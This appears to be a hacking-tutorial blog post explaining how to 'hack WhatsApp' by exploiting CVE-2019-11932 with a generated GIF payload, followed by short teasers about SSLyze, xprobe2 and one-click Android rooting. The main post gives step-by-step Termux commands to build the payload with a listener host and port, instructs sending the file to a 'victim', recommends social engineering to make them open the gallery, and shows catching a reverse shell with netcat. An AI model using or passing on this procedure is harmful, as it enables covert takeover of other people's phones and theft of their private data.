Skip to main content

whatsapp_rce - Termux whatsapp remote code execution

Hello guy's in this article we are going to discuss about how to hack whatsapp with gif image. just you follow the below procedure step by step.

what is whatsapp-rce?

This is a Automated Generate Payload for CVE-2019-11932 (WhatsApp Remote Code Execution)
  • Auto install GCC (no harm command, you can see this is open-source)
  • Saving to .GIF file

Requirements

  • Android version 5.0 and above
  • Termux
  • Git package

How to install and use Whatsapp_rce

Step 1:

First type this below command in your termux terminal this command will help you to download the whatsapp_rce package.
git clone https://github.com/TinToSer/whatsapp_rce.git

Step 2:

Now type this below command this command will help you to open the whatsapp_rec folder on your termux terminal.
cd whatsapp_rce

Step 3:

Now we give permission read, write and execution of start.sh bash file so type this below command on your termux application.
chmod +x start.sh

Step 4:

Now type this below command on your termux terminal this command will help you to run this tool on your terminal.
bash start.sh

Step 5:

Now you type your listener LHOST and LPORT on your termux terminal.


 How Get Shell?

  • You just send the .GIF file to victim user AS A DOCUMENT NOT IMAGES
  • And set the nc / netcat to port you set on the WhatsRCE tools {nc -lnvp your_port}
  • You can use the Social Engineering attack so that victims can be attracted to launch this exploit
  • tell the victim to open the gallery via whatsapp and send the victim to send any photos (no need, it's just got to the gallery no problem) after that a few seconds later you will receive a shell connection from the victim

Sample video file



Comments

Popular posts from this blog

Sslyze-analyze the SSL configuration of a server by connecting to it

 What is SSLyze? SSLyze is a Python tool that can analyze the SSL configuration of a server by connecting to it. It is designed to be fast and comprehensive, and should help organizations and testers identify mis-configurations affecting their SSL servers. Feature of Sslyze Multi-processed and multi-threaded scanning (it’s fast) SSL 2.0/3.0 and TLS 1.0/1.1/1.2 compatibility Performance testing: session resumption and TLS tickets support Security testing: weak cipher suites, insecure renegotiation, CRIME, Heartbleed and more Server certificate validation and revocation checking through OCSP stapling Support for StartTLS handshakes on SMTP, XMPP, LDAP, POP, IMAP, RDP and FTP Support for client certificates when scanning servers that perform mutual authentication XML output to further process the scan results How to install sslyze Just you type this below command in your terminal this command's will help you to install sslyze on your computer and termux. Linux sudo apt-get install ssl...

xprobe2 - A Remote active operating system fingerprinting tool

What is Xprobe2? xprobe2 - A Remote active operating system fingerprinting tool xprobe2 is an active operating system fingerprinting tool with a different approach to operating system fingerprinting. xprobe2 relies on fuzzy signature matching, probabilistic guesses, multiple matches simultaneously, and a signature database. The operation of xprobe2 is described in a paper titled " xprobe2 - A 'Fuzzy ' Approach to Remote Active Operating System Fingerprinting" Option's How to install Xprobe2 First you need to open your terminal after that you type this below command in your terminal this command will help you to install this xprobe2 package. Linux sudo apt install xprobe Termux pkg install xprobe How to use xprobe Just use this below command or see this below image. sudo xprobe2 ( Domain name ) Example's xprobe2 -v -D 1 -D 2 192.168.1.10 Will launch an OS fingerprinting attempt targeting 192.168.1.10. Modules 1 and 2, which are reachability tests, will be di...

Root android phone with one click without computer

 What is framaroot? Framaroot is a free android app which can root almost every device in one click without any need of PC/Computer. Framaroot has its own complex exploits which vary from device to device according to its chipset model and android version. In newer versions of Framaroot, you can unroot your android phone in one click too Feature of Framaroot Root android phone with one click Install SuperSu Unroot or execute Advanced user How to Download and install Framaroot First you download framaroot application on your android phone so click this below download button. Now Install it with a file explorer or directly from your internet browser, if android warn you about security risk, say OK and check Unknown sources to allow install of applications outside of Play Store. How to use Open your Framaroot and select one of the following action: Install SuperSU, Unroot or Execute script (for advanced users) Possible case once application is launched A popup saying "Your device see...